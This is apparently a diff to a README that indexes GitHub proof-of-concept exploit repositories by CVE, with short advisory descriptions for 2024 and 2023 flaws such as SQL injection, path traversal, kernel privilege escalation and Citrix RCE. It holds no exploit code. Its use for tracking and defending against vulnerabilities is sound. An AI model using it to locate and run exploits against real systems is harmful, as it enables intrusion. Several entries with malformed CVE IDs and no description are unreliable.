+A stack-buffer-overflow vulnerability exists in the read_charset_decl function of html2xhtml 1.3. This vulnerability occurs due to improper bounds checking when copying data into a fixed-size stack buffer. An attacker can exploit this vulnerability by providing a specially crafted input to the vulnerable function, causing a buffer overflow and potentially leading to arbitrary code execution, denial of service, or data corruption.
+
+
+- [momo1239/CVE-2024-35333](https://github.com/momo1239/CVE-2024-35333)
+
+### CVE-2024-35468 (-)
+
+A SQL injection vulnerability in /hrm/index.php in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter.
+
+
+- [dovankha/CVE-2024-35468](https://github.com/dovankha/CVE-2024-35468)
+
+### CVE-2024-35469 (-)
+
+A SQL injection vulnerability in /hrm/user/ in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter.
+
+
+- [dovankha/CVE-2024-35469](https://github.com/dovankha/CVE-2024-35469)
+
+### CVE-2024-35475 (-)
+
+A Cross-Site Request Forgery (CSRF) vulnerability was discovered in OpenKM Community Edition on or before version 6.3.12. The vulnerability exists in /admin/DatabaseQuery, which allows an attacker to manipulate a victim with administrative privileges to execute arbitrary SQL commands.
+
+
+- [carsonchan12345/CVE-2024-35475](https://github.com/carsonchan12345/CVE-2024-35475)
+
+### CVE-2024-35511 (-)
+
+phpgurukul Men Salon Management System v2.0 is vulnerable to SQL Injection via the "username" parameter of /msms/admin/index.php.
+
+
+- [efekaanakkar/CVE-2024-35511](https://github.com/efekaanakkar/CVE-2024-35511)
+
+### CVE-2024-36079 (-)
+
+An issue was discovered in Vaultize 21.07.27. When uploading files, there is no check that the filename parameter is correct. As a result, a temporary file will be created outside the specified directory when the file is downloaded. To exploit this, an authenticated user would upload a file with an incorrect file name, and then download it.
+
+
+- [DxRvs/vaultize_CVE-2024-36079](https://github.com/DxRvs/vaultize_CVE-2024-36079)
+
+### CVE-2024-36104 (2024-06-04)
+
+Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14.\n\nUsers are recommended to upgrade to version 18.12.14, which fixes the issue.\n\n
+
+
+- [ggfzx/CVE-2024-36104](https://github.com/ggfzx/CVE-2024-36104)
+
+### CVE-2024-36416 (2024-06-10)
+
+SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a deprecated v4 API example with no log rotation allows denial of service by logging excessive data. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
+
+
+- [kva55/CVE-2024-36416](https://github.com/kva55/CVE-2024-36416)
+
+### CVE-2024-36527 (2024-06-17)
+
+puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
+
+
+- [bigb0x/CVE-2024-36527](https://github.com/bigb0x/CVE-2024-36527)
+
+### CVE-2024-36821 (2024-06-11)
+
+Insecure permissions in Linksys Velop WiFi 5 (WHW01v1) 1.1.13.202617 allows attackers to escalate privileges from Guest to root.
+
+
+- [IvanGlinkin/CVE-2024-36821](https://github.com/IvanGlinkin/CVE-2024-36821)
+
+### CVE-2024-36837 (2024-06-05)
+
+SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
+
+
+- [phtcloud-dev/CVE-2024-36837](https://github.com/phtcloud-dev/CVE-2024-36837)
+
+### CVE-2024-37051 (2024-06-10)
+
+GitHub access token could be exposed to third-party sites in JetBrains IDEs after version 2023.1 and less than: IntelliJ IDEA 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; Aqua 2024.1.2; CLion 2023.1.7, 2023.2.4, 2023.3.5, 2024.1.3, 2024.2 EAP2; DataGrip 2023.1.3, 2023.2.4, 2023.3.5, 2024.1.4; DataSpell 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.2, 2024.2 EAP1; GoLand 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; MPS 2023.2.1, 2023.3.1, 2024.1 EAP2; PhpStorm 2023.1.6, 2023.2.6, 2023.3.7, 2024.1.3, 2024.2 EAP3; PyCharm 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.3, 2024.2 EAP2; Rider 2023.1.7, 2023.2.5, 2023.3.6, 2024.1.3; RubyMine 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP4; RustRover 2024.1.1; WebStorm 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.4
+
+
+- [LeadroyaL/CVE-2024-37051-EXP](https://github.com/LeadroyaL/CVE-2024-37051-EXP)
+- [mrblackstar26/CVE-2024-37051](https://github.com/mrblackstar26/CVE-2024-37051)
+
+### CVE-2024-37079 (2024-06-18)
+
+vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.
+
+
+- [v3rce/CVE-2024-37079-RCE-POC](https://github.com/v3rce/CVE-2024-37079-RCE-POC)
+
+### CVE-2024-37393 (2024-06-10)
+
+Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
+
+
+- [optistream/securenvoy-cve-2024-37393](https://github.com/optistream/securenvoy-cve-2024-37393)
+
+### CVE-2024-37742 (2024-06-25)
+
+An issue in Safe Exam Browser for Windows before 3.6 allows an attacker to share clipboard data between the SEB kiosk mode and the underlying system, compromising exam integrity which may lead to arbitrary code execution and obtaining sensitive information via the Clipboard Management component.
+
+
+- [Eteblue/CVE-2024-37742](https://github.com/Eteblue/CVE-2024-37742)
+
+### CVE-2024-37759 (2024-06-24)
+
+DataGear v5.0.0 and earlier was discovered to contain a SpEL (Spring Expression Language) expression injection vulnerability via the Data Viewing interface.
+
+
+- [crumbledwall/CVE-2024-37759_PoC](https://github.com/crumbledwall/CVE-2024-37759_PoC)
+
+### CVE-2024-37791 (2024-06-18)
+
+DuxCMS3 v3.1.3 was discovered to contain a SQL injection vulnerability via the keyword parameter at /article/Content/index?class_id.
+
+
+- [czheisenberg/CVE-2024-37791](https://github.com/czheisenberg/CVE-2024-37791)
+
+### CVE-2024-37843 (2024-06-25)
+
+Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.
+
+
+- [gsmith257-cyber/CVE-2024-37843-POC](https://github.com/gsmith257-cyber/CVE-2024-37843-POC)
+
+### CVE-2024-37888 (2024-06-14)
+
+The Open Link is a CKEditor plugin, extending context menu with a possibility to open link in a new tab. The vulnerability allowed to execute JavaScript code by abusing link href attribute. It affects all users using the Open Link plugin at version < **1.0.5**.
+
+
+- [7Ragnarok7/CVE-2024-37888](https://github.com/7Ragnarok7/CVE-2024-37888)
+
+### CVE-2024-37889 (2024-06-14)
+
+MyFinances is a web application for managing finances. MyFinances has a way to access other customer invoices while signed in as a user. This method allows an actor to access PII and financial information from another account. The vulnerability is fixed in 0.4.6.
+
+
+- [uname-s/CVE-2024-37889](https://github.com/uname-s/CVE-2024-37889)
+
+### CVE-2024-38396 (2024-06-16)
+
+An issue was discovered in iTerm2 3.5.x before 3.5.2. Unfiltered use of an escape sequence to report a window title, in combination with the built-in tmux integration feature (enabled by default), allows an attacker to inject arbitrary code into the terminal, a different vulnerability than CVE-2024-38395.
+
+
+- [vin01/poc-cve-2024-38396](https://github.com/vin01/poc-cve-2024-38396)
+
+### CVE-2024-65230
+- [CBaekhyunC/cve-2024-65230](https://github.com/CBaekhyunC/cve-2024-65230)
+
+### CVE-2024-206565
+- [sanderswannalive/sumkaluissessss](https://github.com/sanderswannalive/sumkaluissessss)
+
+### CVE-2024-320002
+- [bonnettheo/hook](https://github.com/bonnettheo/hook)
+
+### CVE-2024-1642470
+- [Symbolexe/CVE-2024-1642470](https://github.com/Symbolexe/CVE-2024-1642470)
+
## 2023
+### CVE-2023-0099 (2023-02-13)
+
+The Simple URLs WordPress plugin before 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
+
+
+- [amirzargham/CVE-2023-0099-exploit](https://github.com/amirzargham/CVE-2023-0099-exploit)
+
+### CVE-2023-0156 (2023-04-10)
+
+The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not limit what log files to display in it's settings pages, allowing an authorized user (admin+) to view the contents of arbitrary files and list directories anywhere on the server (to which the web server has access). The plugin only displays the last 50 lines of the file.
+
+
+- [b0marek/CVE-2023-0156](https://github.com/b0marek/CVE-2023-0156)
+
+### CVE-2023-0157 (2023-04-10)
+
+The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page.
+
+
+- [b0marek/CVE-2023-0157](https://github.com/b0marek/CVE-2023-0157)
+
+### CVE-2023-0159 (2023-02-13)
+
+The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
+
+
+- [im-hanzou/EVCer](https://github.com/im-hanzou/EVCer)
+
+### CVE-2023-0266 (2023-01-30)
+
+A use after free vulnerability exists in the ALSA PCM package in the Linux Kernel. SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 is missing locks that can be used in a use-after-free that can result in a priviledge escalation to gain ring0 access from the system user. We recommend upgrading past commit 56b88b50565cd8b946a2d00b0c83927b7ebb055e\n
+
+
+- [SeanHeelan/claude_opus_cve_2023_0266](https://github.com/SeanHeelan/claude_opus_cve_2023_0266)
+
+### CVE-2023-0386 (2023-03-22)
+
+A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.
+
+
+- [puckiestyle/CVE-2023-0386](https://github.com/puckiestyle/CVE-2023-0386)
+- [letsr00t/CVE-2023-0386](https://github.com/letsr00t/CVE-2023-0386)
+- [churamanib/CVE-2023-0386](https://github.com/churamanib/CVE-2023-0386)
+- [EstamelGG/CVE-2023-0386-libs](https://github.com/EstamelGG/CVE-2023-0386-libs)
+
+### CVE-2023-0656 (2023-03-02)
+
+A Stack-based buffer overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash.
+
+
+- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656)
+
+### CVE-2023-08
+- [amirzargham/CVE-2023-08-21-exploit](https://github.com/amirzargham/CVE-2023-08-21-exploit)
+
+### CVE-2023-1177 (2023-03-24)
+
+Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.2.1.\n\n
+
+
+- [iumiro/CVE-2023-1177-MLFlow](https://github.com/iumiro/CVE-2023-1177-MLFlow)
+- [tiyeume25112004/CVE-2023-1177-rebuild](https://github.com/tiyeume25112004/CVE-2023-1177-rebuild)
+
+### CVE-2023-1326 (2023-04-13)
+
+A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.
+
+
+- [diego-tella/CVE-2023-1326-PoC](https://github.com/diego-tella/CVE-2023-1326-PoC)
+- [Pol-Ruiz/CVE-2023-1326](https://github.com/Pol-Ruiz/CVE-2023-1326)
+- [c0d3cr4f73r/CVE-2023-1326](https://github.com/c0d3cr4f73r/CVE-2023-1326)
+- [cve-2024/CVE-2023-1326-PoC](https://github.com/cve-2024/CVE-2023-1326-PoC)
+
+### CVE-2023-1389 (2023-03-15)
+
+TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
+
+
+- [Voyag3r-Security/CVE-2023-1389](https://github.com/Voyag3r-Security/CVE-2023-1389)
+- [Terminal1337/CVE-2023-1389](https://github.com/Terminal1337/CVE-2023-1389)
+
+### CVE-2023-1454 (2023-03-17)
+
+Es wurde eine Schwachstelle in jeecg-boot 3.5.0 entdeckt. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Datei jmreport/qurestSql. Durch Beeinflussen des Arguments apiSelectId mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [shad0w0sec/CVE-2023-1454-EXP](https://github.com/shad0w0sec/CVE-2023-1454-EXP)
+
+### CVE-2023-1698 (2023-05-15)
+
+In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise.
+
+
+- [Chocapikk/CVE-2023-1698](https://github.com/Chocapikk/CVE-2023-1698)
+- [deIndra/CVE-2023-1698](https://github.com/deIndra/CVE-2023-1698)
+- [thedarknessdied/WAGO-CVE-2023-1698](https://github.com/thedarknessdied/WAGO-CVE-2023-1698)
+
+### CVE-2023-1718 (2023-11-01)
+
+\nImproper file stream access in /desktop_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted "tmp_url".\n\n\n\n\n\n
+
+
+- [jhonnybonny/Bitrix24DoS](https://github.com/jhonnybonny/Bitrix24DoS)
+
+### CVE-2023-2023 (2023-05-30)
+
+The Custom 404 Pro WordPress plugin before 3.7.3 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
+
+
+- [thatformat/Hvv2023](https://github.com/thatformat/Hvv2023)
+- [druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation](https://github.com/druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation)
+
+### CVE-2023-2024 (2023-05-18)
+
+Improper authentication in OpenBlue Enterprise Manager Data Collector versions prior to 3.2.5.75 allow access to an unauthorized user under certain circumstances.
+
+
+- [team890/CVE-2023-2024](https://github.com/team890/CVE-2023-2024)
+
+### CVE-2023-2033 (2023-04-14)
+
+Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
+
+
+- [mistymntncop/CVE-2023-2033](https://github.com/mistymntncop/CVE-2023-2033)
+- [tianstcht/CVE-2023-2033](https://github.com/tianstcht/CVE-2023-2033)
+
+### CVE-2023-2215 (2023-04-21)
+
+Es wurde eine kritische Schwachstelle in Campcodes Coffee Shop POS System 1.0 entdeckt. Es betrifft eine unbekannte Funktion der Datei /admin/user/manage_user.php. Mittels Manipulieren des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [zwxxb/CVE-2023-2215](https://github.com/zwxxb/CVE-2023-2215)
+
+### CVE-2023-2255 (2023-05-25)
+
+Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.
+
+
+- [elweth-sec/CVE-2023-2255](https://github.com/elweth-sec/CVE-2023-2255)
+- [SaintMichae64/CVE-2023-2255](https://github.com/SaintMichae64/CVE-2023-2255)
+
+### CVE-2023-2437 (2023-11-22)
+
+The UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.1.1. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. An attacker can leverage CVE-2023-2448 and CVE-2023-2446 to get the user's email address to successfully exploit this vulnerability.
+
+
+- [RxRCoder/CVE-2023-2437](https://github.com/RxRCoder/CVE-2023-2437)
+
+### CVE-2023-2523 (2023-05-04)
+
+Eine kritische Schwachstelle wurde in Weaver E-Office 9.5 ausgemacht. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei App/Ajax/ajax.php?action=mobile_upload_save. Mittels Manipulieren des Arguments upload_quwan mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [bingtangbanli/cve-2023-2523-and-cve-2023-2648](https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648)
+- [Any3ite/CVE-2023-2523](https://github.com/Any3ite/CVE-2023-2523)
+
+### CVE-2023-2598 (2023-06-01)
+
+A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation.
+
+
+- [ysanatomic/io_uring_LPE-CVE-2023-2598](https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598)
+
+### CVE-2023-2640 (2023-07-26)
+
+On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
+
+
+- [OllaPapito/gameoverlay](https://github.com/OllaPapito/gameoverlay)
+- [luanoliveira350/GameOverlayFS](https://github.com/luanoliveira350/GameOverlayFS)
+- [g1vi/CVE-2023-2640-CVE-2023-32629](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629)
+- [musorblyat/CVE-2023-2640-CVE-2023-32629](https://github.com/musorblyat/CVE-2023-2640-CVE-2023-32629)
+- [SanjayRagavendar/Ubuntu-GameOver-Lay](https://github.com/SanjayRagavendar/Ubuntu-GameOver-Lay)
+- [Nkipohcs/CVE-2023-2640-CVE-2023-32629](https://github.com/Nkipohcs/CVE-2023-2640-CVE-2023-32629)
+- [K5LK/CVE-2023-2640-32629](https://github.com/K5LK/CVE-2023-2640-32629)
+
+### CVE-2023-2732 (2023-05-25)
+
+The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.
+
+
+- [ThatNotEasy/CVE-2023-2732](https://github.com/ThatNotEasy/CVE-2023-2732)
+
+### CVE-2023-2744 (2023-06-27)
+
+The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp/v1/accounting/v1/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
+
+
+- [pashayogi/CVE-2023-2744](https://github.com/pashayogi/CVE-2023-2744)
+
+### CVE-2023-2825 (2023-05-26)
+
+An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.
+
+
+- [caopengyan/CVE-2023-2825](https://github.com/caopengyan/CVE-2023-2825)
+- [cc3305/CVE-2023-2825](https://github.com/cc3305/CVE-2023-2825)
+
+### CVE-2023-2868 (2023-05-24)
+
+A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product effecting versions 5.1.3.001-9.2.0.006. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances.
+
+
+- [cashapp323232/CVE-2023-2868CVE-2023-2868](https://github.com/cashapp323232/CVE-2023-2868CVE-2023-2868)
+- [krmxd/CVE-2023-2868](https://github.com/krmxd/CVE-2023-2868)
+
+### CVE-2023-2916 (2023-08-15)
+
+The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.
+
+
+- [d0rb/CVE-2023-2916](https://github.com/d0rb/CVE-2023-2916)
+
+### CVE-2023-2928 (2023-05-27)
+
+In DedeCMS bis 5.7.106 wurde eine kritische Schwachstelle ausgemacht. Dabei geht es um eine nicht genauer bekannte Funktion der Datei uploads/dede/article_allowurl_edit.php. Durch das Manipulieren des Arguments allurls mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [CN016/DedeCMS-getshell-CVE-2023-2928-](https://github.com/CN016/DedeCMS-getshell-CVE-2023-2928-)
+
+### CVE-2023-2982 (2023-06-29)
+
+The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.
+
+
+- [LoaiEsam37/CVE-2023-2982](https://github.com/LoaiEsam37/CVE-2023-2982)
+- [wshinkle/CVE-2023-2982](https://github.com/wshinkle/CVE-2023-2982)
+
+### CVE-2023-3047 (2023-06-13)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TMT Lockcell allows SQL Injection.This issue affects Lockcell: before 15.\n\n
+
+
+- [Phamchie/CVE-2023-3047](https://github.com/Phamchie/CVE-2023-3047)
+- [Kimsovannareth/Phamchie](https://github.com/Kimsovannareth/Phamchie)
+
+### CVE-2023-3076 (2023-07-10)
+
+The MStore API WordPress plugin before 3.9.9 does not prevent visitors from creating user accounts with the role of their choice via their wholesale REST API endpoint. This is only exploitable if the site owner paid to access the plugin's pro features.
+
+
+- [im-hanzou/MSAPer](https://github.com/im-hanzou/MSAPer)
+
+### CVE-2023-3079 (2023-06-05)
+
+Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
+
+
+- [mistymntncop/CVE-2023-3079](https://github.com/mistymntncop/CVE-2023-3079)
+
+### CVE-2023-3124 (2023-06-07)
+
+The Elementor Pro plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_page_option function in versions up to, and including, 3.11.6. This makes it possible for authenticated attackers with subscriber-level capabilities to update arbitrary site options, which can lead to privilege escalation.
+
+
+- [AmirWhiteHat/CVE-2023-3124](https://github.com/AmirWhiteHat/CVE-2023-3124)
+
+### CVE-2023-3244 (2023-08-17)
+
+The Comments Like Dislike plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the restore_settings function called via an AJAX action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to reset the plugin's settings. NOTE: After attempting to contact the developer with no response, and reporting this to the WordPress plugin's team 30 days ago we are disclosing this issue as it still is not updated.
+
+
+- [drnull03/POC-CVE-2023-3244](https://github.com/drnull03/POC-CVE-2023-3244)
+
+### CVE-2023-3450 (2023-06-28)
+
+Eine kritische Schwachstelle wurde in Ruijie RG-BCR860 2.5.13 gefunden. Dies betrifft einen unbekannten Teil der Komponente Network Diagnostic Page. Durch das Manipulieren mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [yuanjinyuyuyu/CVE-2023-3450](https://github.com/yuanjinyuyuyu/CVE-2023-3450)
+- [caopengyan/CVE-2023-3450](https://github.com/caopengyan/CVE-2023-3450)
+
+### CVE-2023-3452 (2023-08-12)
+
+The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.
+
+
+- [leoanggal1/CVE-2023-3452-PoC](https://github.com/leoanggal1/CVE-2023-3452-PoC)
+
+### CVE-2023-3460 (2023-07-04)
+
+The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
+
+
+- [gbrsh/CVE-2023-3460](https://github.com/gbrsh/CVE-2023-3460)
+- [rizqimaulanaa/CVE-2023-3460](https://github.com/rizqimaulanaa/CVE-2023-3460)
+- [yon3zu/Mass-CVE-2023-3460](https://github.com/yon3zu/Mass-CVE-2023-3460)
+- [EmadYaY/CVE-2023-3460](https://github.com/EmadYaY/CVE-2023-3460)
+- [diego-tella/CVE-2023-3460](https://github.com/diego-tella/CVE-2023-3460)
+- [Rajneeshkarya/CVE-2023-3460](https://github.com/Rajneeshkarya/CVE-2023-3460)
+- [BlackReaperSK/CVE-2023-3460_POC](https://github.com/BlackReaperSK/CVE-2023-3460_POC)
+- [julienbrs/exploit-CVE-2023-3460](https://github.com/julienbrs/exploit-CVE-2023-3460)
+
+### CVE-2023-3519 (2023-07-19)
+
+Unauthenticated remote code execution\n
+
+
+- [telekom-security/cve-2023-3519-citrix-scanner](https://github.com/telekom-security/cve-2023-3519-citrix-scanner)
+- [securekomodo/citrixInspector](https://github.com/securekomodo/citrixInspector)
+- [mr-r3b00t/CVE-2023-3519](https://github.com/mr-r3b00t/CVE-2023-3519)
+- [d0rb/CVE-2023-3519](https://github.com/d0rb/CVE-2023-3519)
+- [dorkerdevil/CitrixFall](https://github.com/dorkerdevil/CitrixFall)
+- [BishopFox/CVE-2023-3519](https://github.com/BishopFox/CVE-2023-3519)
+- [SalehLardhi/CVE-2023-3519](https://github.com/SalehLardhi/CVE-2023-3519)
+- [KR0N-SECURITY/CVE-2023-3519](https://github.com/KR0N-SECURITY/CVE-2023-3519)
+- [passwa11/CVE-2023-3519](https://github.com/passwa11/CVE-2023-3519)
+- [rwincey/cve-2023-3519](https://github.com/rwincey/cve-2023-3519)
+- [mandiant/citrix-ioc-scanner-cve-2023-3519](https://github.com/mandiant/citrix-ioc-scanner-cve-2023-3519)
+- [Chocapikk/CVE-2023-3519](https://github.com/Chocapikk/CVE-2023-3519)
+- [JonaNeidhart/CVE-2023-3519-BackdoorCheck](https://github.com/JonaNeidhart/CVE-2023-3519-BackdoorCheck)
+- [Mohammaddvd/CVE-2023-3519](https://github.com/Mohammaddvd/CVE-2023-3519)
+
+### CVE-2023-3710 (2023-09-12)
+
+Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n
+
+
+- [vpxuser/CVE-2023-3710-POC](https://github.com/vpxuser/CVE-2023-3710-POC)
+
+### CVE-2023-3711 (2023-09-12)
+
+Session Fixation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Session Credential Falsification through Prediction.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n
+
+
+- [vpxuser/CVE-2023-3711-POC](https://github.com/vpxuser/CVE-2023-3711-POC)
+
+### CVE-2023-3712 (2023-09-12)
+
+Files or Directories Accessible to External Parties vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Privilege Escalation.This issue affects PM43 versions prior to P10.19.050004. \n\nUpdate to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\n\n
+
+
+- [vpxuser/CVE-2023-3712-POC](https://github.com/vpxuser/CVE-2023-3712-POC)
+
+### CVE-2023-3824 (2023-08-11)
+
+In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. \n\n
+
+
+- [Nuki2u/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK](https://github.com/Nuki2u/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK)
+- [jhonnybonny/CVE-2023-3824](https://github.com/jhonnybonny/CVE-2023-3824)
+
+### CVE-2023-3836 (2023-07-22)
+
+In Dahua Smart Park Management bis 20230713 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /emap/devicePoint_addImgIco?hasSubsystem=true. Durch Manipulation des Arguments upload mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [zh-byte/CVE-2023-3836](https://github.com/zh-byte/CVE-2023-3836)
+
